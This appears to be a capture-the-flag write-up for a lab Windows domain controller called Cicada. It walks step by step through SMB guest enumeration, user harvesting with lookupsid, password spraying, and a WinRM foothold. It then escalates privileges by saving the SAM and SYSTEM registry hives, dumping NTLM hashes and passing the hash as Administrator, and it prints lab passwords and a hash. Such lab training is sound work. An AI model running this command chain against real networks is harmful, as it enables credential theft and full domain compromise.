CICADA

Topics will be covered

• Active Directory Enumeration and Privilege Escalation

• Password Spraying

• SeBackup Privilege Abuse

• Pass-the-Hash Attack

Enumeration and Exploitation tools :

• Nmap

• SMB

• Lookupsid

• Password Spraying

• Enumerating Domain Users

• Foothold

• Privilege Escalation

Nmap

nmap -sV -Pn 10.10.11.35

Findings

• Kerberos (port 88)

• LDAP/S (ports 389, 636, 3268, 3269)

• Domain: cicada.htb

• Host: CICADA-DC.cicada.htb

** Note: As there is no web interface, the first thing we can check is the SMB shares.

SMB shares

crackmapexec - a popular tool to automate enumerating domains (including users, files/ directories, and shares)

Note : if we specify any user the results would be much more better Lets take guest as user and no password.

crackmapexec smb cicada.htb -u 'guest' -p '' --shares

• We can see HR share and IPC$ shares are able to read by guest user.

Smbclient

smbclient  //cicada.htb/HR

• Let's get the notice from HR.txt to kali

• And lets try reading what's inside the note---it seems we have default password for 1st time login

Impackets - Impacket is an open-source toolkit

• Common Attacks & Exploits

Post-Exploitation & Enumeration

• Now lets try lookupsids from impackets with "guest" and "-no-passs" with (Attempts authentication without a password (null session).)

impacket-lookupsid 'cicada.htb/guest'@cicada.htb -no-pass 

• we find groups, users, and aliases within the domain

• To view SID's

In cmd - wmic useraccount get name,sid
In power shell - Get-ADUser -Identity "Username" | Select-Object SID
In impackets lookupsid - impacket-lookupsid 'DOMAIN/user'@TARGET_IP

Common Well-Known SIDs

• Windows has built-in SIDs for default accounts and groups:

• Coming back to our ad - since we want a list of the users only we will separate them with small alteration as below

sed 's/.*\\\(.*\) (SidTypeUser)/\1/' 
.*\\: Matches everything up to and including the backslash (domain)
\(.*\): Captures the username (saved in group \1)
(SidTypeUser): Matches the trailing identifier
\1: Replaces entire line with just the captured username

• So the final command is

 impacket-lookupsid 'cicada.htb/guest'@cicada.htb -no-pass | grep 'SidTypeUser' | sed 's/.*\\\(.*\) (SidTypeUser)/\1/'

• Now lets create a user list text file and then using this and lets try the password-spray attack

Password Spraying

• For password spraying we choosing crackmapexec only

crackmapexec smb cicada.htb -u user.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'

• We can observe that the user michael is still using the old default password given by the AD

• Let's try login with the it

• Since we don't have access to any of other servers a michel.wrightson user lets try to find the other users smb-shares with this user as below

crackmapexec smb cicada.htb -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' -- users 

• This should give us the user descriptions data stored during the user creation. This might be not be empty sometimes.

Foothold

• Lets check whether we have share access with David user

crackmapexec smb cicada.htb -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares 

• Good david have the more shares permission than guest user.

• Now lets try to connect using smbclient to see all the share first lets try with DEV share

smbclient //cicada.htb/DEV -U 'david.orelious%aRt$Lp#7t*VQ!3'

• He is having a powershell script

• lets try to open it and we can see the pssword got converted into power shell string

• lets try to decrypt the string using the poweshell in kali,

• It seems not working, lets try another method

Evil-WinRm

• Execute PowerShell commands.

• Upload/download files.

• Load in-memory PowerShell modules (like Mimikatz).

• Requirements: WinRM must be enabled on the target.

evil-winrm -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -i cicada.htb 

• We've successfully gotten a WinRM session

Privilege Escalation

• Lets try some windows commands and see the permission

whoami /priv -  which will give you the Privilege Name  and its state (enables/disables)

• Some of the most important privilages | Privilege Name | Description | |----------------|-------------| |SeImpersonatePrivilege|Potato attacks (JuicyPotato, PrintSpoofer) → SYSTEM access| |SeAssignPrimaryTokenPrivilege| Token manipulation attacks| |SeBackupPrivilege| Backup and restore files, folders, and registry keys(Read sensitive files (e.g., SAM, registry))| |SeRestorePrivilege| Restore files, folders, and registry keys (Write sensitive files (e.g., SAM, registry))| |SeDebugPrivilege|Inject into processes (Mimikatz, dumping LSASS)| |SeLoadDriverPrivilege|Load and unload device drivers(Load malicious kernel drivers)| |SeTakeOwnershipPrivilege|Take ownership of files, folders, and registry keys (Change permissions on sensitive files)|

• We can see SeBackupPrivilege - This privilege was designed to facilitate system backups and it enables access to system-protected files.

• user having this permission can able to access the SYSTEM and SAM Windows Registry Hives, through which we can have the escalation.

• Now lets try to copy the both sam and system registries to the current location using cmd

reg save hklm\sam sam
reg save hklm\system system
download sam ----> which will downlode to kali
download system----> 

Impacket's secretsdump

• Now since we got the sam and system mail regestry as files.

• Lets do the dumping process where the impackets will dump the user NTLM hashes.

impacket-secretsdump -sam sam -system system local 

• Note: local - Indicates that the files are stored locally (not a live system).

• We can use it to directly log in to the account with Evil-WinRM by passing it as a parameter with -H

evil-winrm -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341 -i cicada.htb